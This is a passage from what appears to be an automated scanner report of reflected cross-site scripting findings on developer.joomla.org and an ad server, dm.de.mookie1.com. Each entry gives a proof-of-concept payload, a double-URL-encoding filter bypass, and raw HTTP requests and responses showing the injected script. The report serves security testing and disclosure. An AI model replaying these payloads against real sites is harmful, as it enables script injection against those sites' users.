Content-Type: text/html; charset=utf-8
Content-Length: 8141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/c2f1d"><img src=a onerror=alert(1)>956a7445bcc" />
...[SNIP]...

4.65. http://developer.joomla.org/improving-joomla.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/improving-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e835%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e03e4a9b113f was submitted in the REST URL parameter 1. This input was echoed as 6e835"><img src=a onerror=alert(1)>03e4a9b113f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /6e835%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e03e4a9b113f HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.18.10.1295890937;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/6e835"><img src=a onerror=alert(1)>03e4a9b113f" />
...[SNIP]...

4.66. http://developer.joomla.org/security.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/security.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9be7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec8433896990 was submitted in the REST URL parameter 1. This input was echoed as a9be7"><img src=a onerror=alert(1)>c8433896990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /a9be7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec8433896990 HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=24d4dc7aa5497203c5eea18807f36bae; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/a9be7"><img src=a onerror=alert(1)>c8433896990" />
...[SNIP]...

4.67. http://developer.joomla.org/security/a [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/security/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fee9a%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e313d6b92d96 was submitted in the REST URL parameter 2. This input was echoed as fee9a"><img src=a onerror=alert(1)>313d6b92d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /security/afee9a%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e313d6b92d96 HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/security/53028%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee019f420596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.9.10.1295890937; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.10.10.1295890937; 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:59:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
X-Content-Encoded-By: Joomla! 1.6
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 8151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/security/afee9a"><img src=a onerror=alert(1)>313d6b92d96" />
...[SNIP]...

4.68. http://developer.joomla.org/security/news.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/security/news.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53028%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee019f420596 was submitted in the REST URL parameter 2. This input was echoed as 53028"><img src=a onerror=alert(1)>e019f420596 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /security/53028%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee019f420596 HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/security/53028"><img src=a onerror=alert(1)>e019f420596" />
...[SNIP]...

4.69. http://developer.joomla.org/security/news.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/security/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e865402a94b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dce01\\\"><script>alert(1)</script>865402a94b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /security/news.html?dce01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e865402a94b=1 HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=eadd17f1c6c6ff18997751a779b9f23d; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<link href="/security/news.feed?dce01\\\"><script>alert(1)</script>865402a94b=1&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.70. http://developer.joomla.org/strategy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/strategy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ca8%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e15c9b3e2c1f was submitted in the REST URL parameter 1. This input was echoed as 26ca8"><img src=a onerror=alert(1)>15c9b3e2c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /26ca8%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e15c9b3e2c1f HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.18.10.1295890937;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/26ca8"><img src=a onerror=alert(1)>15c9b3e2c1f" />
...[SNIP]...

4.71. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619ee"><script>alert(1)</script>2b06e2712f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM619ee"><script>alert(1)</script>2b06e2712f8/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:31:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM619ee"><script>alert(1)</script>2b06e2712f8/2010DM/593445285/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.72. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60cc"><script>alert(1)</script>4f017f29e35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd60cc"><script>alert(1)</script>4f017f29e35/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd60cc"><script>alert(1)</script>4f017f29e35/1511925775/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.73. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f6bd"><script>alert(1)</script>eb615743a72 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1596198292@x231f6bd"><script>alert(1)</script>eb615743a72?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/861969584/x231f6bd"><script>alert(1)</script>eb615743a72/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.74. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11596989115@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a398"><script>alert(1)</script>d8345505b59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM7a398"><script>alert(1)</script>d8345505b59/DLX/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM7a398"><script>alert(1)</script>d8345505b59/DLX/874784747/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.75. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11596989115@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71cf"><script>alert(1)</script>38508b24698 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXa71cf"><script>alert(1)</script>38508b24698/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXa71cf"><script>alert(1)</script>38508b24698/937889478/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.76. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11596989115@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fb7"><script>alert(1)</script>41ff5d04ea0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11596989115@x92b6fb7"><script>alert(1)</script>41ff5d04ea0? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/600055347/x92b6fb7"><script>alert(1)</script>41ff5d04ea0/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.77. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44cca"><script>alert(1)</script>4362d4b98ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM44cca"><script>alert(1)</script>4362d4b98ab/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM44cca"><script>alert(1)</script>4362d4b98ab/DLX/2078582943/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.78. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8295a"><script>alert(1)</script>ab128e6cc17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX8295a"><script>alert(1)</script>ab128e6cc17/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
